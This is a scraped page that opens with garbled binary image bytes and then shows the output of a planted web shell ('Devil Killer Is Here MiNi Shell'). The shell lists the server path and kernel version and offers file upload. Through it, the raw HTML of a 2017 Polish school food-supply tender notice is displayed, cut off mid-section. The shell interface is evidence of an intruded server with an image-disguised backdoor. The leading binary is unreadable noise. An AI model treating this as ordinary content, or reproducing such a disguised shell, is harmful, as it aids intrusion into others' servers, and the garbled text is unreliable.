JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170601/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170601/523155-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 523155-N-2017 z dnia 2017-06-01 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa artykułów żywieniowych w roku szkolnym 2017/2018 dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Świętego Jana Pawła II w Białymstoku</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii"></span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy"></span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">5213233300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Łagodna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">10</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">15757 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Białystok</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podlaskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">856 644 680</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zsi1@neostrada.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">856 540 049</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zsi1.internetdsl.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy składać w siedzibie zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul Łagodna 10, sekretariat szkoły</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa artykułów żywieniowych w roku szkolnym 2017/2018 dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Świętego Jana Pawła II w Białymstoku</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">6</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Artykuły spożywcze, 2. Nabiał, 3. Warzywa, owoce i jaja, 4. Mięso i wyroby wędliniarskie, 5. Mrożonki i ryby, 6. Pieczywo i wyroby cukiernicze</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15800000-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2017-09-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-08-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Oświadczenie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Oświadczenie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Oświadczenie</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Załącznik Nr 3 do SIWZ</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Załącznik Nr 3 do SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Załącznik Nr 3 do SIWZ</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span 